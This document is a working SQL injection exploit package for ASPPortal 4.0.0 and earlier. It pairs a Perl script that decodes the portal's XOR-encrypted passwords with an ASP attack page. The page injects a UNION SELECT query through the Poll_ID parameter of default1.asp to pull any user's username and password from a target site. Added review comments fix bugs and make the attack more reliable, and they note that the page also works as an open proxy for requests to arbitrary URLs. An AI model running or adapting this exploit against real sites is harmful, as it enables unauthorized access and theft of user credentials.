
ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



Perl password-decoder script (decodes the value that exploit1.asp returns):

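#!/usr/bin/perl
# AspPortal password decrypter.
# Paste the encrypted password string obtained from exploit1.asp when prompted.
# Special thanks to Nukedx for the ASPPortal decrypter.
# ajann
#
# NOTE(review): `use strict` / `use warnings` are deliberately not enabled at
# file level.  The subs below communicate through undeclared package globals
# ($appass, $appwd, $apkey), and the double-quoted key literal in decrypt()
# interpolates `$WBIXQA` (the `\\` before it ends the escape), which is a
# compile error under strict vars.  Declare the globals with `our` and repair
# the literal before turning strict on.
#
# The original guard here was `if(@1 = 1) { exploit(); }`: a list assignment
# to the package array @1, whose scalar value is the number of elements on
# the right-hand side (1), so the condition was always true and this was an
# unconditional call.  It may have been a mangled @ARGV check; confirm against
# the original posting if argument handling was intended.
exploit();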

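# Decode an ASPPortal password with the portal's fixed XOR key.
#
# Reads the (entity-decoded) ciphertext from the package global $appass,
# XORs it byte for byte against the corresponding prefix of the key and
# prints the result, then exits -- it never returns to the caller.  The
# decoded text is also left in the package global $appwd, as before.
#
# Dies with "- An error occurued" when $appass is empty or undefined.
sub decrypt {
    our ($appass, $appwd, $apkey);

    # ASPPortal's static key, as published with milw0rm exploit 1597.
    # NOTE(review): this is a double-quoted literal.  Besides the escaped
    # `\$` sequences it still interpolates `@5`, `@3`, `@AVD8C` and (because
    # the `\\` before it ends the escape) `$WBIXQA`, all of which are empty
    # at runtime, so the key actually used is shorter than the text shown.
    # It is kept byte for byte from the original because the true key bytes
    # cannot be recovered from this listing; if decoded output looks wrong,
    # compare this literal against the original key material first.
    $apkey =
"IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%XA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0U0];[LQ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBIXQA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURYK@3W0^K)<OG40?(VJ4ELWL5H5M<\$A);CQ36R9I]*U#Q%R<Y\&SH%#R<V";

    my $cipher_len = length($appass);
    die("- An error occurued\r\n") if !$cipher_len;

    $appwd = _xor_decode($appass, $apkey);
    print "- Password decrypted as: $appwd\r\n";
    exit();
}

# XOR $cipher against $key position by position, from the first byte.
# Positions beyond the end of $key are XORed with 0 (passed through),
# which is what the original reverse-order loop did via ord(undef).  The
# original prepended one byte at a time while walking backwards, so the
# result is the same forward-order string as this append loop produces.
sub _xor_decode {
    my ($cipher, $key) = @_;
    my $key_len = length($key);
    my $plain   = '';
    for my $pos (0 .. length($cipher) - 1) {
        my $key_byte = $pos < $key_len ? ord(substr($key, $pos, 1)) : 0;
        $plain .= chr($key_byte ^ ord(substr($cipher, $pos, 1)));
    }
    return $plain;
}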
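# Prompt for the encrypted password string copied out of exploit1.asp, undo
# the HTML entities the page wraps it in, hand it to decrypt() through the
# package global $appass and exit.  decrypt() exits itself, so the trailing
# exit() is reached only if decrypt() is ever changed to return.
sub exploit {
    our $appass;

    print "Password?: ";
    my $line = <STDIN>;
    # EOF before any input (e.g. an empty pipe): treat it as an empty
    # password, which decrypt() rejects, instead of chopping undef.
    $line = '' unless defined $line;

    # chomp, not chop: chop removes the final character unconditionally, so
    # input that arrived without a trailing newline (echo -n, a pasted line
    # without Enter) lost its last ciphertext byte.
    chomp $line;

    # Map the entities the original handled back to the raw characters the
    # XOR key expects.  Plain substitutions; the /e + chr() form was
    # needlessly indirect.
    # NOTE(review): `&amp;` is not mapped, so an ampersand in the stored
    # value would still reach the decoder as `&amp;`.  Verify against a real
    # capture before adding it (it would have to be decoded last).
    $line =~ s/&quot;/"/g;
    $line =~ s/&lt;/</g;
    $line =~ s/&gt;/>/g;
    $line =~ s/&nbsp;/ /g;

    $appass = $line;
    decrypt();
    exit();
}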



Exploit (exploit1.asp, a server-side ASP page):


<%
' Buffer the whole page so the Response.Redirect calls issued further down,
' after markup has already been emitted, can still set headers.
Response.Buffer = True
' NOTE(review): this silences every runtime error on the page -- a failed
' CreateObject, a refused connection or a malformed target URL all degrade
' to empty strings with no diagnostic.  It is the reason failures only ever
' surface as the "Didnt Take" alert in the page script.
On Error Resume Next
' Two sequential HTTP requests to the target are made per run (one per
' injected column); allow up to 100 seconds for the pair.
Server.ScriptTimeout = 100
%>

<%

'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by   : ajann
'[Author   : ajann
'[Contact    : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr: Alınan şifreyi Perl scriptinde çözün. (EN: decode the retrieved password with the Perl script above.)
'[Using : Tr: Scriptin Türkçe kurulumlarında bu exploitle bilgileri alamazsınız, manuel çekebilirsiniz. (EN: against a Turkish-language ASPPortal install this exploit cannot scrape the values -- presumably because the "Poll Question:" marker text it searches for differs -- so pull them manually.)
'[Using : Tr: Kimsenin böyle yapacak kadar seviyesiz olduğunu düşünmüyorum. (EN: I don't think anyone is low enough to actually do this.)
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke

%>

<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>

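<script language="JavaScript">
  // Failure checks for the results page.  Both look at the hidden field1,
  // which holds the scraped password; an empty value means the injection
  // did not return anything.
  //
  // Fix: field1 lives in form2 (the hidden form at the bottom of the page);
  // form1 only holds text1, id and the submit button.  The original read
  // document.form1.field1.value, i.e. ".value" of undefined, which throws
  // before either alert or message could ever appear.
  //
  // Function names are kept because the inline script at the end of the
  // page calls write() and functionControl1() by name.
  function scrapedPassword() {
    return document.form2.field1.value;
  }

  // Two seconds after the page script runs, pop an alert on failure.
  function functionControl1() {
    setTimeout(functionControl2, 2000);
  }

  function functionControl2() {
    if (scrapedPassword() === "") {
      alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
    }
  }

  // One second after the page script runs, render the same failure notice
  // inline into the htmlAlani div.  The element is only looked up when the
  // value is empty, as before.
  function writetext() {
    if (scrapedPassword() === "") {
      var slot = document.getElementById('htmlAlani');
      slot.innerHTML = '<font face="Verdana" size="1" color="#008000">There is a problem... The Data Didn\'t Take </font>';
    }
  }

  function write() {
    setTimeout(writetext, 1000);
  }
</script>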


</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">

<center>
<font face="Verdana" size="2" color="#008000"><b><a 
href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: 
collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" 
bordercolordark="#008000" bordercolor="#808080">
  <tr>
    <td width="50%" bgcolor="#808000" 
onmouseover="javascript:this.style.background='#808080';" 
onmouseout="javascript:this.style.background='#808000';">
    <font face="Arial" size="1"><b><font 
color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
    <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font 
face="Arial" size="1"><b>Example:[User 
    ID=1]</b></font></td>
    <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
  </tr>

</table>

<div id=htmlAlani></div>

<%
' Error-code round trip: the "get" branch further down redirects back to
' this page with islem=hataN, and this block turns that code into a
' message.  islem is only ever compared against fixed literals, so the
' query-string value itself is never echoed into the page.  The same
' variable is read again below to select the "get" branch.
islem = Request.QueryString("islem")

If islem = "hata1" Then
    Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
ElseIf islem = "hata2" Then
    Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
ElseIf islem = "hata3" Then
    Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://"";</font>"
End If
%>

<%  

' Main branch: the form on this page posts back with ?islem=get.  The If
' chain opened here (and the three nested ones below) is closed by the
' End If run at the very end of the page, after the HTML.
If islem = "get" Then

' Both requests go to the same script; string1/string2 are identical and
' exist only because the two fetch functions below are separate.
string1="default1.asp"
string2="default1.asp"
' User id typed into the form.  take()/take1() append it to the injected
' SQL; it is not validated anywhere on this page.
cek= Request.Form("id")


targettext = Request.Form("text1")
' Rejects a target URL containing "union" (case-insensitive, compare=1)
' with hata2.  A crude self-check, not a security control: the injection
' itself travels in the POST body built by take()/take1().
arama=InStr(1, targettext, "union" ,1)
' NOTE(review): the ";" after the closing quote on the next line is not
' VBScript syntax (the form's value attribute carries the same stray ";").
' It looks like a transcription artifact of the listing and has to be
' removed for the page to compile.
arama2=InStr(1, targettext, "http://"; ,1)

' Validation chain, reported back through the hataN redirects.  Beyond
' requiring "http://" somewhere in the string, the target is not checked:
' anyone who can reach exploit1.asp can make this server POST to an
' arbitrary URL (the page is effectively an open SSRF proxy), so do not
' leave it on an exposed host.
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")

Else
If arama>0 then 
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then 
Response.Redirect("exploit1.asp?islem=hata3")

Else
%> 

<%

' Target URLs for the two requests.  Nothing inserts a "/" between the
' typed base URL and "default1.asp", so the value entered in the form must
' end with one (the example text on the form omits it).  "+" concatenates
' here only because both operands are strings; "&" is the unambiguous
' VBScript concatenation operator.
target1 = targettext+string1
target2 = targettext+string2

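' Fetch the target page with the poll-vote SQL injection, asking the
' database for the "username" column of the requested user.
'
' come: absolute URL of the target's default1.asp (built from the form
'       input on this page).
' Reads the page-level variable cek (the user id from the form) and returns
' the raw response body.  With On Error Resume Next in force on this page a
' failed request yields an empty value rather than an error; the HTTP
' status is not inspected.
'
' NOTE(review): take1 below is the same request with "password" in place
' of "username".  A single helper taking the column name would remove the
' duplication; both are kept independent here.
Public Function take(come)
    Dim objtake
    ' NOTE(review): Microsoft.XMLHTTP is the client-side (WinInet) control;
    ' MSXML2.ServerXMLHTTP is the variant intended for use inside ASP.
    ' Left unchanged to avoid altering the page's COM dependency.
    Set objtake = Server.CreateObject("Microsoft.XMLHTTP")
    With objtake
        .Open "POST", come, FALSE
        .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        ' Poll_ID is the injectable parameter.  The id from the form is
        ' URL-encoded so a stray "&", "+" or "%" typed into the form cannot
        ' split or corrupt the body; digits pass through unchanged.  Enter
        ' the value raw -- do not pre-encode it.
        .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20" & Server.URLEncode(cek)
        take = .Responsetext
    End With
    Set objtake = Nothing
End Function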

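' Fetch the target page with the poll-vote SQL injection, asking the
' database for the "password" column of the requested user.
'
' come1: absolute URL of the target's default1.asp (built from the form
'        input on this page).
' Reads the page-level variable cek (the user id from the form) and returns
' the raw response body.  With On Error Resume Next in force on this page a
' failed request yields an empty value rather than an error; the HTTP
' status is not inspected.
'
' NOTE(review): identical to take() except for the selected column; a
' shared helper taking the column name would remove the duplication.
Public Function take1(come1)
    Dim objtake1
    ' NOTE(review): Microsoft.XMLHTTP is the client-side (WinInet) control;
    ' MSXML2.ServerXMLHTTP is the variant intended for use inside ASP.
    ' Left unchanged to avoid altering the page's COM dependency.
    Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP")
    With objtake1
        .Open "POST", come1, FALSE
        .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
        ' Poll_ID is the injectable parameter.  The id from the form is
        ' URL-encoded so a stray "&", "+" or "%" typed into the form cannot
        ' split or corrupt the body; digits pass through unchanged.  Enter
        ' the value raw -- do not pre-encode it.
        .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20" & Server.URLEncode(cek)
        take1 = .Responsetext
    End With
    Set objtake1 = Nothing
End Function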

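' One request per injected column; each response carries its value in the
' poll-question slot.
get_username = take(target1)
get_password = take1(target2)

' The injected value is rendered immediately after this marker.  It is
' located in EACH response: the original reused the offset found in the
' username page for the password page as well.
marker = "Poll Question:</b>&nbsp;"
username = ExtractInjected(get_username, marker)
passwd = ExtractInjected(get_password, marker)

' Return the text that follows marker in body.
'
' Returns "" when the marker is absent, so the page's failure check (empty
' field1) actually fires instead of displaying 14 bytes of whatever sat at
' offset 24 of the response.  The value is cut at the next "<": the Perl
' decoder un-escapes &lt;/&gt;/&quot;, which suggests the portal
' HTML-encodes the value, so a literal "<" should not occur inside it.
' If no "<" follows, fall back to the original fixed 14-character window.
Public Function ExtractInjected(body, marker)
    Dim startPos, stopPos
    ExtractInjected = ""
    startPos = InStr(body, marker)
    If startPos = 0 Then Exit Function
    startPos = startPos + Len(marker)
    stopPos = InStr(startPos, body, "<")
    If stopPos > 0 Then
        ExtractInjected = Mid(body, startPos, stopPos - startPos)
    Else
        ExtractInjected = Mid(body, startPos, 14)
    End If
End Function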

%>
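<center>
<% ' Results.  username/passwd come straight out of the target's HTTP
   ' response (see take/take1), so they are untrusted: they are HTML-encoded
   ' here, both in the visible cells and in the hidden field1 attribute, so
   ' a target that plants markup or script in that slot cannot run it in the
   ' operator's browser.  "" & x forces a string, so an Empty value (request
   ' failed under On Error Resume Next) encodes as "" and the page's failure
   ' check still sees an empty field1. %>
<font face="Verdana" size="2" color="#008000"> <u><b>ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
  <tr>
    <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b><font size="2" face="Arial">User Name:</font></b></td>
    <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=Server.HTMLEncode("" & username)%></font></b></td>
  </tr>
  <tr>
    <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
    <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=Server.HTMLEncode("" & passwd)%></font></b></td>
  </tr>
</table>

<% ' Hidden copy of the scraped password for the page script's failure
   ' checks, which look for an input named field1. %>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=Server.HTMLEncode("" & passwd)%>">
</form>

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>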

<%
' Closes, innermost first: "If arama2=0" (hata3), "If arama>0" (hata2),
' "If targettext=""" (hata1) and the outer "If islem = ""get""" branch,
' all opened in the block that precedes the HTML above.
End If
End If
End If
End If
' objtake is already released inside take(); this second release of the
' page-level name is redundant but harmless.
Set objtake = Nothing 
%>